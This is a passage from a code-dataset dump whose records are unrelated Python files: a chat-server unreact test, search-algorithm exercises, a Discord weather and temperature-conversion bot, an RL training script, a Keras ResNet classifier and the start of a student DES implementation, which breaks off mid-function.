message_unreact(None, None, 1)\n\ndef test_channel_invalid_message_id(d):\n '''Invalid messenger ID'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n with pytest.raises(ValueError):\n message_unreact(dict['token'], None, 1)\n\n@pytest.mark.parametrize(\"react_id\", [4, 2, -1, 'Apple', ' ', None])\ndef test_channel_invalid_react_id(d, react_id):\n '''Invalid react ID'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n channel_id = json.loads(channels_create(dict['token'], 'Test_Channel', True))['channel_id']\n message_id = json.loads(message_send(dict['token'], channel_id, \"Random Message\"))['message_id']\n with pytest.raises(ValueError):\n message_unreact(dict['token'], message_id, react_id)\n\ndef test_message_react_successfull(d):\n '''Message react succesfull'''\n db.reset_DB()\n dict = json.loads(auth_register(d['email'], d['psw'], d['f_name'], d['l_name']))\n channel_id = json.loads(channels_create(dict['token'], 'Test_Channel', True))['channel_id']\n message_id = json.loads(message_send(dict['token'], channel_id, \"Hi Green\"))['message_id']\n\n data = db.load_DB()\n message_react(dict['token'], message_id, '1')\n data = db.load_DB()\n message_unreact(dict['token'], message_id, '1')\n data = db.load_DB()\n assert message_flags(message_id, data['messages']) == 2\n","sub_path":"server/message_unreact_test.py","file_name":"message_unreact_test.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"169399062","text":"\"\"\"Övningar på sökalgoritmer.\n\"\"\"\n\n\ndef linear_search(l, v):\n \"\"\"Implementation av sequential search.\n\n Detta är den naiva algoritmen för sökning i listor (eller arrayer), se\n Wikipedia_. Fördelen är att den fungerar även för osorterade listor.\n\n Funktionen ska returnera indexet för det sökta värdet `v` i listan `l`. Om\n inte det sökta värdet, `v`, finns i listan `l` ska istället undantaget\n `ValueError` kastas.\n\n .. _Wikipedia: https://en.wikipedia.org/wiki/Linear_search#Basic_algorithm\n \"\"\"\n\n for i in range(0, len(l)):\n if l[i] == v:\n return i\n raise ValueError\n\n\ndef binary_search(l, v):\n \"\"\"Implementation av binary search.\n\n Detta är den klassiska algoritmen för sökning i sorterade listor (eller\n arrayer), se Wikipedia_.\n\n Funktionen ska returnera indexet för det sökta värdet `v` i listan `l`. Om\n inte det sökta värdet, `v`, finns i listan `l` ska istället undantaget\n `ValueError` kastas.\n\n .. _Wikipedia: https://en.wikipedia.org/wiki/Binary_search_algorithm#Algorith\n \"\"\"\n\n min = 0\n max = len(l) - 1\n while True:\n if max < min:\n raise ValueError\n m = (min + max) // 2\n if l[m] < v:\n min = m + 1\n elif l[m] > v:\n max = m - 1\n else:\n return m\n","sub_path":"exercises/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"629534643","text":"from discord import Embed, Colour\nfrom geopy.geocoders import Nominatim\nimport re\nimport datetime\n\n\ndef get_output(w_text):\n # Adds the appropriate weather emoji to w_text\n \n w_low = w_text.lower()\n \n if \"tornado\" in w_low:\n return \"🌪️ \" + w_text\n \n if any(x in w_low for x in [\"hurricane\", \"tropical\"]):\n return \"🌀 \" + w_text\n \n if any(x in w_low for x in [\"snow\", \"flurries\", \"hail\"]):\n return \"🌨️ \" + w_text\n \n if \"thunder\" in w_low:\n return \"⛈️ \" + w_text\n \n if any(x in w_low for x in [\"rain\", \"drizzle\", \"showers\", \"sleet\"]):\n return \"🌧️ \" + w_text\n \n if \"cold\" in w_low:\n return \"❄️ \" + w_text\n \n if any(x in w_low for x in [\"windy\", \"blustery\", \"breezy\"]):\n return \"🌬️ \" + w_text\n \n if \"mostly cloudy\" in w_low:\n return \"⛅ \" + w_text\n \n if any(x in w_low for x in [\"partly cloudy\", \"scattered clouds\",\n \"few clouds\", \"broken clouds\"]):\n return \"🌤️ \" + w_text\n \n if any(x in w_low for x in [\"cloudy\", \"clouds\"]):\n return \"☁️ \" + w_text\n \n if \"fair\" in w_low:\n return \"🌄 \" + w_text\n \n if any(x in w_low for x in [\"hot\", \"sunny\", \"clear\"]):\n return \"☀️ \" + w_text\n \n if any(x in w_low for x in [\"dust\", \"foggy\", \"haze\", \"smoky\"]):\n return \"️🌫️ \" + w_text\n \n # No emoji for that text, return text\n return w_text\n\n\ndef f_to_c(f):\n return int((int(f) - 32) / 1.8)\n\n\ndef c_to_f(c):\n return int((int(c) * 1.8) + 32)\n\n\ndef c_to_k(c):\n return int(int(c) + 273)\n\n\ndef k_to_c(k):\n return int(int(k) - 273)\n\n\ndef f_to_k(f):\n return c_to_k(f_to_c(int(f)))\n\n\ndef k_to_f(k):\n return c_to_f(k_to_c(int(k)))\n\n\nclass TempConvert:\n def __init__(self, client):\n self.client = client\n\n self.name = \"tempconvert\"\n self.aliases = [\n \"tconvert\",\n \"tempcon\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Converts between Fahrenheit, Celsius and \" \\\n \"Kelvin.\"\n self.usage = \"tempconvert \"\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"temperature\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n if len(args) < 2:\n return await self.client.errors.MissingArgs(\n \"from_type\"\n ).send(\n message.channel\n )\n\n if len(args) < 3:\n return await self.client.errors.MissingArgs(\n \"to_type\"\n ).send(\n message.channel\n )\n\n temp, from_type, to_type, *_ = args\n\n types = [\"Fahrenheit\", \"Celsius\", \"Kelvin\"]\n\n try:\n m = int(args[0])\n except ValueError:\n return await self.client.errors.InvalidArgs(\n args[0],\n \"temperature\"\n ).send(message.channel)\n\n args_1_l = args[1].lower()\n \n args_2_l = args[2].lower()\n\n f = next(\n (\n x for x in types\n if x.lower() == args_1_l or x.lower()[0] == args_1_l[0]\n ), None\n )\n \n t = next(\n (\n x for x in types\n if x.lower() == args_2_l or x.lower()[0] == args_2_l\n ), None\n )\n\n if not f:\n # Invalid from type\n return await self.client.errors.InvalidArgs(\n args[1],\n \"from_type\"\n ).send(message.channel)\n if not t:\n # Invalid to type\n return await self.client.errors.InvalidArgs(\n args[2],\n \"to_type\"\n ).send(message.channel)\n if f == t:\n # Same in as out\n return await self.client.errors.UnchangedOutput(\n str(f),\n str(t)\n ).send(message.channel)\n\n if f == \"Fahrenheit\":\n if t == \"Celsius\":\n out_val = f_to_c(m)\n else:\n out_val = f_to_k(m)\n elif f == \"Celsius\":\n if t == \"Fahrenheit\":\n out_val = c_to_f(m)\n else:\n out_val = c_to_k(m)\n else:\n if t == \"Celsius\":\n out_val = k_to_c(m)\n else:\n out_val = k_to_f(m)\n\n await message.channel.send(\n embed=Embed(\n title=\"Converted!\",\n type=\"rich\",\n colour=Colour.from_rgb(234, 111, 255)\n ).add_field(\n name=\"Input\",\n value=\"{:,}{}{}\".format(\n m,\n \"\" if (f == \"Kelvin\") else \"°\",\n f[0]\n ),\n inline=True\n ).add_field(\n name=\"Output\",\n value=\"{:,}{}{}\".format(\n out_val,\n \"\" if (t == \"Kelvin\") else \"°\",\n t[0]\n ),\n inline=True\n )\n )\n\n\nclass Weather:\n @staticmethod\n def get_weather_embed(r=None):\n \n if not r:\n # Non mutable default parameters\n r = {}\n \n # Returns a string representing the weather passed\n main = r[\"main\"]\n weather = r[\"weather\"]\n coord = r[\"coord\"]\n sys = r[\"sys\"]\n\n # Make sure we get the temps in both F and C\n tc = k_to_c(main[\"temp\"])\n tf = c_to_f(tc)\n min_c = k_to_c(main[\"temp_min\"])\n min_f = c_to_f(min_c)\n max_c = k_to_c(main[\"temp_max\"])\n max_f = c_to_f(max_c)\n lat = coord[\"lat\"]\n lon = coord[\"lon\"]\n \n place = r.get(\"name\", lat)\n country = sys.get(\"country\", lon)\n flag = f\":flag_{country.lower()}:\" if country else \"\"\n \n # Gather the formatted conditions\n condition_list = []\n for x, y in enumerate(weather):\n d = y[\"description\"]\n if x == 0:\n d = d.capitalize()\n condition_list.append(get_output(d))\n condition = \", \".join(condition_list)\n\n return Embed(\n title=\"Weather for {}, {} {}\".format(place, country, flag),\n type=\"rich\",\n colour=Colour.from_rgb(234, 111, 255)\n ).add_field(\n name=\"Current Temperature\",\n value=\"{}°C ({}°F)\".format(tc, tf),\n inline=True\n ).add_field(\n name=\"Condition\",\n value=condition,\n inline=True\n ).add_field(\n name=\"Daily High\",\n value=\"High of {}°C ({}°F)\".format(max_c, max_f),\n ).add_field(\n name=\"Daily Low\",\n value=\"Low of {}°C ({}°F)\".format(min_c, min_f),\n inline=True\n ).set_footer(\n text=f\"Lat: {lat} | Lon: {lon} | Powered by OpenWeatherMap\"\n if (place != lat or country != lon) else \"Powered by\"\n \" OpenWeatherMap\"\n )\n\n def __init__(self, client):\n self.client = client\n\n self.name = \"weather\"\n self.aliases = [\n \"currentweather\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Gets some weather.\"\n self.usage = \"weather \"\n self.geo = Nominatim(user_agent=\"TFR-Bot\")\n self.key = self.client.config.openweathermap_key\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"place_name\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n place_name = \" \".join(args)\n\n # Strip anything that's non alphanumeric or a space\n place_name = re.sub(r'([^\\s\\w]|_)+', '', str(place_name))\n location = self.geo.geocode(str(place_name))\n\n if location is None:\n return await self.client.errors.PlaceNotFound(\n place_name\n ).send(\n message.channel\n )\n\n # Just want the current weather\n r = await self.client.DL.async_json(\n \"http://api.openweathermap.org/data/2.5/weather?\"\n \"appid={}&lat={}&lon={}\".format(\n self.key,\n location.latitude,\n location.longitude\n )\n )\n \n embed = self.get_weather_embed(r)\n\n await message.channel.send(\n embed=embed\n )\n\n\nclass Forecast:\n @staticmethod\n def get_weather_text(r):\n # Returns a string representing the weather passed\n main = r[\"main\"]\n weath = r[\"weather\"]\n\n # Make sure we get the temps in both F and C\n tc = k_to_c(main[\"temp\"])\n tf = c_to_f(tc)\n min_c = k_to_c(main[\"temp_min\"])\n min_f = c_to_f(min_c)\n max_c = k_to_c(main[\"temp_max\"])\n max_f = c_to_f(max_c)\n\n # Gather the formatted conditions\n condition_list = []\n for x, y in enumerate(weath):\n d = y[\"description\"]\n if x == 0:\n d = d.capitalize()\n condition_list.append(get_output(d))\n condition = \", \".join(condition_list)\n\n # Format the description\n desc = \"{}°C ({}°F),\\n\\n{},\\n\\nHigh of {}°C ({}°F) - Low of\" \\\n \" {}°C ({}°F)\\n\\n\".format(\n tc, tf,\n condition,\n max_c, max_f,\n min_c, min_f\n )\n\n return desc\n\n def __init__(self, client):\n self.client = client\n\n self.name = \"forecast\"\n self.aliases = [\n \"weatherforecast\"\n ]\n\n self.category = \"Utilities\"\n self.perm_level = 0\n self.description = \"Gets some weather, for 5 days.\"\n self.usage = \"forecast \"\n self.geo = Nominatim(user_agent=\"TFR-Bot\")\n self.key = self.client.config.openweathermap_key\n\n async def run(self, _, message, *args):\n if len(args) == 0:\n return await self.client.errors.MissingArgs(\n \"place_name\"\n ).send(\n message.channel\n )\n\n self.client.args_parser.get_args(\n message,\n *args\n )\n\n place_name = \" \".join(args)\n\n # Strip anything that's non alphanumeric or a space\n place_name = re.sub(r'([^\\s\\w]|_)+', '', str(place_name))\n location = self.geo.geocode(str(place_name))\n\n if location is None:\n return await self.client.errors.PlaceNotFound(\n place_name\n ).send(\n message.channel\n )\n\n # We want the 5-day forecast at this point\n r = await self.client.DL.async_json(\n \"http://api.openweathermap.org/data/2.5/forecast?appid={}\"\n \"&lat={}&lon={}\".format(\n self.key,\n location.latitude,\n location.longitude\n )\n )\n\n try:\n city = r[\"city\"]\n city_name = city[\"name\"]\n country = city[\"country\"]\n flag = \":flag_{}:\".format(str(country).lower())\n\n title = \"5 Day Forecast for {}, {} {}\".format(\n city_name,\n country,\n flag\n )\n except KeyError:\n title = \"5 Day Forecast for {}\".format(location)\n\n days = {}\n for x in r[\"list\"]:\n # Check if the day exists - if not, we set up a pre-day\n day = x[\"dt_txt\"].split(\" \")[0]\n is_noon = \"12:00:00\" in x[\"dt_txt\"]\n if day not in days:\n days[day] = {\n \"main\": x[\"main\"],\n \"weather\": x[\"weather\"],\n \"day_count\": 1\n }\n continue\n # Day is in the list - let's check values\n if x[\"main\"][\"temp_min\"] < days[day][\"main\"][\"temp_min\"]:\n days[day][\"main\"][\"temp_min\"] = x[\"main\"][\"temp_min\"]\n if x[\"main\"][\"temp_max\"] > days[day][\"main\"][\"temp_max\"]:\n days[day][\"main\"][\"temp_max\"] = x[\"main\"][\"temp_max\"]\n # Add the temp\n days[day][\"main\"][\"temp\"] += x[\"main\"][\"temp\"]\n days[day][\"day_count\"] += 1\n # Set the weather data if is noon\n if is_noon:\n days[day][\"weather\"] = x[\"weather\"]\n\n embed = Embed(\n type=\"rich\",\n title=title,\n color=Colour.from_rgb(234, 111, 255)\n ).set_footer(\n text=\"Powered by OpenWeatherMap\"\n )\n\n for day in sorted(days):\n # Average the temp, strip weather duplicates\n days[day][\"main\"][\"temp\"] /= days[day][\"day_count\"]\n embed.add_field(\n name=(\n datetime.datetime.strptime(day, \"%Y-%m-%d\")\n .strftime(\"%A, %b %d, %Y\") + \":\"\n ),\n value=self.get_weather_text(days[day]),\n inline=False\n )\n\n await message.channel.send(embed=embed)\n\n\ndef setup(client):\n client.command_handler.add_commands(\n TempConvert(client),\n Weather(client),\n Forecast(client)\n )\n","sub_path":"Extensions/Weather.py","file_name":"Weather.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"65946667","text":"import gym\nimport numpy as np\nimport pybulletgym\nfrom SQL_torch import Agent\nfrom utils import plot_learning_curve\nfrom gym import wrappers\nimport math\nfrom multigoal import MultiGoalEnv\nimport torch as T\nfrom plotter import QFPolicyPlotter\nfrom networks import MLPActorCritic, SamplingNetwork\n\n\n# env= MultiGoalEnv()\n# hid = 256\n# l =2\n# epochs=20\n# seed = 42\n# gamma =0.99\n\n# ac,ac_targ,sampler = svgd(lambda : gym.make(env) , actor_critic=MLPActorCritic, sampler=SamplingNetwork, ac_kwargs=dict(hidden_sizes=[hid]*l),\n# steps_per_epoch=100, replay_size=int(1e6),\n# polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n# update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n# max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs)\n\n# lambda : gym.make(env) , actor_critic=MLPActorCritic, ac_kwargs=dict(hidden_sizes=[hid]*l),\n# steps_per_epoch=100, replay_size=int(1e6),\n# polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n# update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n# max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs\n\nif __name__ == \"__main__\":\n \n env= MultiGoalEnv()\n hid = 256\n l =2\n epochs=20\n seed = 42\n gamma =0.99\n \n agent = Agent(lambda : gym.make(env) , actor_critic=MLPActorCritic, sampler=SamplingNetwork, ac_kwargs=dict(hidden_sizes=[hid]*l),\n steps_per_epoch=100, replay_size=int(1e6),\n polyak=0.995, pi_lr=1e-3, q_lr=1e-3, batch_size=100,noise_dim = 2, n_particles=16, start_steps=0, \n update_after=1000, update_every=1, act_noise=0.1, num_test_episodes=10, \n max_ep_len=30, save_freq=1, gamma=gamma, seed=seed, epochs=epochs)\n \n \n update_every=1\n update_after=50\n max_ep_len=30\n start_steps=0\n steps_per_epoch=100\n # Prepare for interaction with environment\n total_steps = steps_per_epoch * epochs\n \n \n \n o, ep_ret, ep_len = env.reset(), 0, 0\n\n # Main loop: collect experience in env and update/log each epoch\n \n for t in range(total_steps):\n \n # Until start_steps have elapsed, randomly sample actions\n # from a uniform distribution for better exploration. Afterwards, \n # use the learned policy (with some noise, via act_noise). \n if t > start_steps:\n a = agent.get_sample(o)\n else:\n a = env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = env.step(a)\n ep_ret += r\n ep_len += 1\n #print(\"t=\",t,\"ep_ret=\",ep_ret, \"ep_len=\",ep_len)\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n d = False if ep_len==max_ep_len else d\n\n # Store experience to replay buffer\n agent.replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of trajectory handling\n if d or (ep_len == max_ep_len):\n #logger.store(EpRet=ep_ret, EpLen=ep_len)\n o, ep_ret, ep_len = env.reset(), 0, 0\n \n print(t)\n # Update handling\n if t >= update_after and t % update_every == 0:\n batch = agent.replay_buffer.sample_batch(agent.batch_size)\n #print(\"before updating..\")\n agent.learn(data=batch)\n #print(\"after updating..\")\n\n # End of epoch handling\n if (t+1) % steps_per_epoch == 0:\n epoch = (t+1) // steps_per_epoch\n print(\"epoch=\",epoch)\n agent.plot_paths(epoch)\n\n # Save model\n #if (epoch % save_freq == 0) or (epoch == epochs):\n #logger.save_state({'env': env}, None)\n\n # Test the performance of the deterministic version of the agent.\n # agent.test_agent()\n \n\n\n\n\n# ac,ac_targ,sampler = svgd(lambda : gym.make(env) , actor_critic=MLPActorCritic, ac_kwargs=dict(hidden_sizes=[hid]*l), \n# gamma=gamma, seed=seed, epochs=epochs)\n\n\n\n# plotter = QFPolicyPlotter(qf = ac.q, policy=sampler, obs_lst=[[0,0],[-2.5,-2.5],[2.5,2.5],[-2.5,2.5],[2.5,-2.5]], default_action =[np.nan,np.nan], n_samples=100)\n# plotter.draw()\n\n\n\n\n# def plot(agent):\n# paths = []\n# actions_plot=[]\n# env = MultiGoalEnv()\n# n_games = 50\n# max_episode_length = 20\n# for i in range(n_games):\n# observation = env.reset()\n# episode_length = 0\n# done = False\n# score = 0\n# path = {'infos':{'pos':[]}}\n# while not done:\n# env.render()\n# #print('state: ', np.squeeze(observation))\n# action = agent.get_action_svgd(T.from_numpy(observation).unsqueeze(0).double()).squeeze().detach().numpy()\n\n# #print('ac: ', action[0].cpu().detach().numpy())\n# observation_, reward, done, info = env.step(action)\n# path['infos']['pos'].append(observation)\n \n# if episode_length == max_episode_length:\n# done = True\n# episode_length += 1\n \n# #print('re:', reward)\n# score += reward\n# observation = observation_\n# paths.append(path)\n \n# score = score / 200\n# score_history.append(score)\n# avg_score = np.mean(score_history[-20:])\n \n# env.render_rollouts(paths, fout=\"test_%d.png\" % i)\n\n\n# if __name__ == '__main__':\n# env = MultiGoalEnv()\n# # print(env.observation_space.shape)\n# # print(env.action_space.shape)\n# agent = Agent(state_dim=env.observation_space.shape[0], env=env,\n# action_dim=env.action_space.shape[0], n_particles=32, batch_size=100, reward_scale=0.1, max_action=env.action_space.high)\n# n_games = 50\n# # uncomment this line and do a mkdir tmp && mkdir video if you want to\n# # record video of the agent playing the game.\n# #env = wrappers.Monitor(env, 'tmp/video', video_callable=lambda episode_id: True, force=True)\n# filename = 'inverted_pendulum.png'\n# figure_file = 'plots/' + filename\n\n# #print(env.action_space.high)\n \n# best_score = env.reward_range[0]\n# score_history = []\n# load_checkpoint = False\n \n# max_episode_length = 100\n\n# if load_checkpoint:\n# agent.load_models()\n# env.render(mode='human')\n\n# for i in range(n_games):\n \n# #observation = env.reset(init_state=[2.5, 2.5])\n# observation = env.reset()\n# episode_length = 0\n \n# done = False\n# score = 0\n \n# while not done:\n# #env.render()\n# #print('state: ', np.squeeze(observation))\n# action = agent.get_action_svgd(T.from_numpy(observation).unsqueeze(0)).squeeze().detach().numpy()\n \n \n# #print('ac: ', np.squeeze(action))\n# observation_, reward, done, info = env.step(action)\n \n# if episode_length == max_episode_length:\n# done = True\n# #print(episode_length)\n# #print('re:', reward)\n# #print('Q: ', np.squeeze(env.get_Q()))\n# score += reward\n# agent.remember(observation, action, reward, observation_, done)\n# if not load_checkpoint:\n# agent.learn(episode_length)\n# observation = observation_\n# episode_length += 1\n\n \n# score = score \n# score_history.append(score)\n# avg_score = np.mean(score_history[-20:])\n \n# if avg_score > best_score:\n# best_score = avg_score\n# # if not load_checkpoint:\n# # agent.save_models()\n# print('episode ', i, 'score %.1f' % score, 'avg_score %.1f' % avg_score)\n \n# plot(agent)\n \n \n \n# #agent.actor.sample_normal(T.FloatTensor([2.5,2.5]).repeat([100,1]))[0].detach().numpy()\n \n# plotter = QFPolicyPlotter(qf = agent.Q_Network, agent=agent, obs_lst=[[-2.5,-2.5],[0,0],[2.5,2.5]], default_action =[np.nan,np.nan], n_samples=50)\n# plotter.draw()\n\n\n# env.close() \n \n \n\n \n \n","sub_path":"archive/version 1/main_SQL_multigoal.py","file_name":"main_SQL_multigoal.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"453924388","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom keras import layers\r\nfrom keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, \\\r\n BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D\r\nfrom keras.models import Model, load_model\r\nfrom keras.preprocessing import image\r\nfrom keras.utils import layer_utils\r\nfrom keras.utils.data_utils import get_file\r\nfrom keras.applications.imagenet_utils import preprocess_input\r\nfrom keras.utils.vis_utils import model_to_dot\r\nfrom keras.utils import plot_model\r\nfrom keras.initializers import glorot_uniform\r\nEPOCH = 20\r\nBATCH_SIZE = 16\r\n\r\nTEST_SIZE = 794\r\nTRAIN_SIZE = 4750\r\n\r\ntrain_name = 'train_single.tfrecords'\r\ntest_name = 'test_raw_64.tfrecords'\r\n\r\n\r\n# 恒等模块——identity_block\r\ndef identity_block(X, f, filters, stage, block):\r\n # 定义基本的名字\r\n conv_name_base = \"stage_conv2d_\" + str(stage) + \"_branch_\" + block +\"_\"\r\n bn_name_base = \"stage_BNormal_\" + str(stage) + \"_branch_\" + block +\"_\"\r\n\r\n # 保存输入值,后面将需要添加回主路径\r\n X_shortcut = X\r\n\r\n # 主路径第一部分\r\n X = Conv2D(filters=filters, kernel_size=(f, f), strides=(1, 1), padding=\"same\",\r\n name=conv_name_base + \"2a\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = BatchNormalization(axis=3, name=bn_name_base + \"2a\")(X)\r\n X = Activation(\"relu\")(X)\r\n\r\n # 主路径第二部分\r\n #X = Conv2D(filters=filters, kernel_size=(f, f), strides=(1, 1), padding=\"same\",\r\n # name=conv_name_base + \"2b\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n #X = BatchNormalization(axis=3, name=bn_name_base + \"2b\")(X)\r\n #X = Activation(\"relu\")(X)\r\n\r\n X = layers.add([X, X_shortcut])\r\n X = Activation(\"relu\")(X)\r\n return X\r\n\r\ndef ResNet(input_shape=(64, 64, 3), classes=12):\r\n # 将输入定义为维度大小为 input_shape的张量\r\n X_input = Input(input_shape)\r\n\r\n # Stage 1\r\n X = Conv2D(64, kernel_size=(1, 1), strides=(1, 1), name=\"Start_Conv1\", kernel_initializer=glorot_uniform(seed=0))(X_input)\r\n X = BatchNormalization(axis=3, name=\"Start_BN_conv1\")(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(X)\r\n\r\n #stage 2\r\n X = identity_block(X, f=3, filters=64, stage=2, block=\"a\")\r\n X = identity_block(X, f=3, filters=64, stage=2, block=\"b\")\r\n \r\n X = Conv2D(128, kernel_size=(3, 3), strides=(2, 2), name=\"Mid_conv2\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = BatchNormalization(axis=3, name=\"Start_BN_conv2\")(X)\r\n X = Activation(\"relu\")(X)\r\n \r\n X = identity_block(X, f=3, filters=128, stage=3, block=\"a\")\r\n X = identity_block(X, f=3, filters=128, stage=3, block=\"b\")\r\n \r\n X = Conv2D(256, kernel_size=(3, 3), strides=(2, 2), name=\"Mid_conv3\", kernel_initializer=glorot_uniform(seed=0))(X)\r\n X = BatchNormalization(axis=3, name=\"Start_BN_conv3\")(X)\r\n X = Activation(\"relu\")(X)\r\n \r\n X = identity_block(X, f=3, filters=256, stage=4, block=\"a\")\r\n \r\n #stage 3\r\n #X = identity_block(X, f=3, filters=256, stage=3, block=\"a\")\r\n #X = identity_block(X, f=3, filters=256, stage=3, block=\"b\")\r\n\r\n # 最后阶段\r\n # 平均池化\r\n X = AveragePooling2D(pool_size=(2, 2))(X)\r\n\r\n # 输出层\r\n X = Flatten()(X) # 展平\r\n X = Dense(classes, activation=\"softmax\", name=\"fc\" + str(classes), kernel_initializer=glorot_uniform(seed=0))(X)\r\n\r\n # 创建模型\r\n model = Model(inputs=X_input, outputs=X, name=\"ResNet50\")\r\n\r\n return model\r\n\r\n\r\ndef read_and_decode(filename):\r\n filename_queue = tf.train.string_input_producer([filename])\r\n reader = tf.TFRecordReader()\r\n _, serialized_example = reader.read(filename_queue)\r\n features = tf.parse_single_example(serialized_example, features={\r\n 'label': tf.FixedLenFeature([], tf.int64),\r\n 'img_raw': tf.FixedLenFeature([], tf.string)\r\n })\r\n\r\n img = tf.decode_raw(features['img_raw'], tf.uint8)\r\n img = tf.reshape(img, [64, 64, 3])\r\n img = tf.cast(img, tf.float32) * (1. / 255)\r\n\r\n label = tf.cast(features['label'], tf.int32)\r\n label = tf.one_hot(label, 12, 1, 0)\r\n return img, label\r\n\r\n# 运行构建的模型图\r\nmodel = ResNet(input_shape=(64, 64, 3), classes=12)\r\n\r\n# 编译模型来配置学习过程\r\nmodel.compile(optimizer=\"adam\", loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\r\n\r\n# 加载数据集\r\nimage1, label1 = read_and_decode(train_name)\r\nx_train, y_train = tf.train.batch([image1, label1], batch_size=TRAIN_SIZE, capacity=50000)\r\n\r\nimage2, label2 = read_and_decode(test_name)\r\nx_test, y_test = tf.train.batch([image2, label2], batch_size=TEST_SIZE, capacity=50000)\r\ninit = tf.global_variables_initializer()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n\r\n X_train, Y_train = sess.run([x_train, y_train])\r\n X_test, Y_test = sess.run([x_test, y_test])\r\n print(\"number of training examples = \" + str(X_train.shape[0]))\r\n print(\"number of test examples = \" + str(X_test.shape[0]))\r\n print(\"X_train shape: \" + str(X_train.shape))\r\n print(\"Y_train shape: \" + str(Y_train.shape))\r\n print(\"X_test shape: \" + str(X_test.shape))\r\n print(\"Y_test shape: \" + str(Y_test.shape))\r\n # 训练模型\r\n model.summary()\r\n for i in range(EPOCH):\r\n model.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE, verbose=2, validation_split=0.1)\r\n\r\n # 测试集性能测试\r\n preds = model.evaluate(X_test, Y_test)\r\n print(\"Loss = \" + str(preds[0]))\r\n print(\"Test Accuracy =\" + str(preds[1]))\r\n\r\n coord.request_stop()\r\n coord.join(threads)","sub_path":"deep learn course codes/ResNet for Plant Seedlings Classification/simple_ResNet8.py","file_name":"simple_ResNet8.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"574301538","text":"#!/usr/bin/env python3\n# prachee javiya\nfrom typing import List\nimport DES_tables as Table\n\n\ndef permutation(L: List[str], T: List[str]) -> List[str]:\n \"\"\"returns permuted list based on table T:List[str]\"\"\"\n new_L = L.copy()\n for i in range(len(T)):\n new_L[i] = L[T[i] - 1]\n\n return new_L\n\n\ndef generate_bit(text: str) -> List[str]:\n \"\"\"Convert characters to 8 bit utf-8,\n integers are converted to string\n \"\"\"\n text = list(bytes(str(text), 'utf-8'))\n b_text = []\n for x in text:\n #code here\n b = bin(x)[2:]\n if len(b) < 8:\n for _ in range(8 - len(b)):\n b = '0' + b\n #print(len(b), b)\n byte = list(b)\n for bit in byte:\n b_text.append(bit)\n return b_text\n\n\ndef intTObin(i: int) -> List[str]:\n \"\"\" result of s_boxes are extended to 4 bits \n \"\"\"\n s = bin(i)\n l = []\n s1 = ''\n if len(s[2:]) < 4:\n for _ in range(4 - len(s[2:])):\n s1 = s1 + '0'\n s1 = s1 + s[2:]\n for x in s1:\n l.append(x)\n return l\n\n\ndef bit_rotation(n: int, b_key: List[str]) -> List[str]:\n \"\"\"breaks the list into 2 and rotate each by n:int times\n \"\"\"\n left = b_key[:len(b_key) // 2].copy()\n right = b_key[(len(b_key) // 2):].copy()\n for _ in range(n):\n left.insert(0, left[-1])\n left.pop(-1)\n right.insert(0, right[-1])\n right.pop(-1)\n for x in right:\n left.append(x)\n return left\n\n\ndef subkey_generation(b_key: List[str]) -> List[List[str]]:\n \"\"\"\n returns list of 16 subkeys of size 48\n \"\"\"\n shift = [1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28]\n subkeys = []\n for i in range(16):\n subkeys.append(bit_rotation(shift[i], b_key))\n #printList(subkeys[i])\n permutation(subkeys[i], Table.PC2)\n subkeys[i] = subkeys[i][:48]\n return subkeys\n\n\ndef key_generation(key: str) -> List[List[str]]:\n \"\"\" generate main key b_key and returns subkeys using subkey generator\n \"\"\"\n b_key = generate_bit(key)\n while (len(b_key) < 64):\n print('short key, Enter new KEY:')\n b_key = generate_bit(input())\n #trim to 64 